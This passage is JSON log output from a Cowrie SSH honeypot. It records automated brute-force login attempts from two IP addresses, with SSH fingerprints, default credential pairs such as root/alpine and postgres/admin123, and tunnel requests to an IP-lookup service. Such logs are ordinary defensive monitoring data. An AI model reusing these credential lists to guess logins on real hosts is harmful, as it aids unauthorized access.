"hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:46:15.865903Z","src_ip":"212.227.235.229","session":"da4a90c4e464"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43412,"dst_ip":"1.2.3.4","dst_port":22,"session":"34c7990a85aa","protocol":"ssh","message":"New connection: 212.227.125.160:43412 (1.2.3.4:22) [session: 34c7990a85aa]","sensor":"my-vps","timestamp":"2025-08-31T04:46:16.189529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:16.190401Z","src_ip":"212.227.125.160","session":"34c7990a85aa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:46:16.373393Z","src_ip":"212.227.125.160","session":"34c7990a85aa"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:16.922435Z","src_ip":"212.227.125.160","session":"34c7990a85aa"}
{"eventid":"cowrie.login.success","username":"root","password":"ipscan","message":"login attempt [root/ipscan] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:46:17.345942Z","src_ip":"212.227.235.229","session":"da4a90c4e464"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:17.369031Z","src_ip":"212.227.235.229","session":"d79e9b2b7fe9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:46:17.840207Z","session":"da4a90c4e464"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:18.106149Z","src_ip":"212.227.125.160","session":"34c7990a85aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45002,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6818bad24fe","protocol":"ssh","message":"New connection: 212.227.235.229:45002 (1.2.3.4:22) [session: b6818bad24fe]","sensor":"my-vps","timestamp":"2025-08-31T04:46:18.236536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:18.237535Z","src_ip":"212.227.235.229","session":"b6818bad24fe"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T04:46:18.335132Z","src_ip":"212.227.235.229","session":"b6818bad24fe"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"p2ssw0rd","message":"login attempt [oracle/p2ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:18.629625Z","src_ip":"212.227.235.229","session":"b6818bad24fe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:46:18.846461Z","src_ip":"212.227.235.229","session":"da4a90c4e464"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:19.495269Z","src_ip":"212.227.235.229","session":"da4a90c4e464"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:19.729246Z","src_ip":"212.227.235.229","session":"b6818bad24fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34762,"dst_ip":"1.2.3.4","dst_port":22,"session":"85b0995f2be8","protocol":"ssh","message":"New connection: 212.227.125.160:34762 (1.2.3.4:22) [session: 85b0995f2be8]","sensor":"my-vps","timestamp":"2025-08-31T04:46:20.390924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:20.738767Z","src_ip":"212.227.125.160","session":"85b0995f2be8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:46:20.739667Z","src_ip":"212.227.125.160","session":"85b0995f2be8"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"admin123","message":"login attempt [postgres/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:23.054979Z","src_ip":"212.227.125.160","session":"85b0995f2be8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50618,"dst_ip":"1.2.3.4","dst_port":22,"session":"052e1f4140bc","protocol":"ssh","message":"New connection: 212.227.125.160:50618 (1.2.3.4:22) [session: 052e1f4140bc]","sensor":"my-vps","timestamp":"2025-08-31T04:46:24.359301Z"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:24.589382Z","src_ip":"212.227.125.160","session":"85b0995f2be8"}
{"eventid":"cowrie.login.success","username":"root","password":"alpine","message":"login attempt [root/alpine] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:46:25.537520Z","src_ip":"212.227.235.229","session":"4954b2ee9f1e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:46:25.799201Z","session":"4954b2ee9f1e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:46:26.516957Z","src_ip":"212.227.235.229","session":"4954b2ee9f1e"}
{"eventid":"cowrie.session.closed","duration":"16.9","message":"Connection lost after 16.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:26.805367Z","src_ip":"212.227.235.229","session":"4954b2ee9f1e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:28.083121Z","src_ip":"212.227.125.160","session":"052e1f4140bc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:46:28.083782Z","src_ip":"212.227.125.160","session":"052e1f4140bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37566,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc2144282c97","protocol":"ssh","message":"New connection: 212.227.125.160:37566 (1.2.3.4:22) [session: dc2144282c97]","sensor":"my-vps","timestamp":"2025-08-31T04:46:31.968884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:31.969884Z","src_ip":"212.227.125.160","session":"dc2144282c97"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:46:32.151630Z","src_ip":"212.227.125.160","session":"dc2144282c97"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:32.699207Z","src_ip":"212.227.125.160","session":"dc2144282c97"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:33.883068Z","src_ip":"212.227.125.160","session":"dc2144282c97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54712,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e3ff4157f8b","protocol":"ssh","message":"New connection: 212.227.235.229:54712 (1.2.3.4:22) [session: 7e3ff4157f8b]","sensor":"my-vps","timestamp":"2025-08-31T04:46:34.622174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:46:34.624962Z","src_ip":"212.227.235.229","session":"7e3ff4157f8b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:46:34.889486Z","src_ip":"212.227.235.229","session":"7e3ff4157f8b"}
{"eventid":"cowrie.login.failed","username":"test","password":"q1w2e3","message":"login attempt [test/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:37.057484Z","src_ip":"212.227.235.229","session":"7e3ff4157f8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46638,"dst_ip":"1.2.3.4","dst_port":22,"session":"9037a6128cf8","protocol":"ssh","message":"New connection: 212.227.125.160:46638 (1.2.3.4:22) [session: 9037a6128cf8]","sensor":"my-vps","timestamp":"2025-08-31T04:46:37.114513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:37.115457Z","src_ip":"212.227.125.160","session":"9037a6128cf8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:46:37.302952Z","src_ip":"212.227.125.160","session":"9037a6128cf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54726,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdffd5004a4c","protocol":"ssh","message":"New connection: 212.227.235.229:54726 (1.2.3.4:22) [session: fdffd5004a4c]","sensor":"my-vps","timestamp":"2025-08-31T04:46:37.836137Z"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:46:37.857411Z","src_ip":"212.227.125.160","session":"052e1f4140bc"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:37.867530Z","src_ip":"212.227.125.160","session":"9037a6128cf8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:46:37.880102Z","src_ip":"212.227.235.229","session":"fdffd5004a4c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:46:38.130085Z","src_ip":"212.227.235.229","session":"fdffd5004a4c"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:38.324529Z","src_ip":"212.227.235.229","session":"7e3ff4157f8b"}
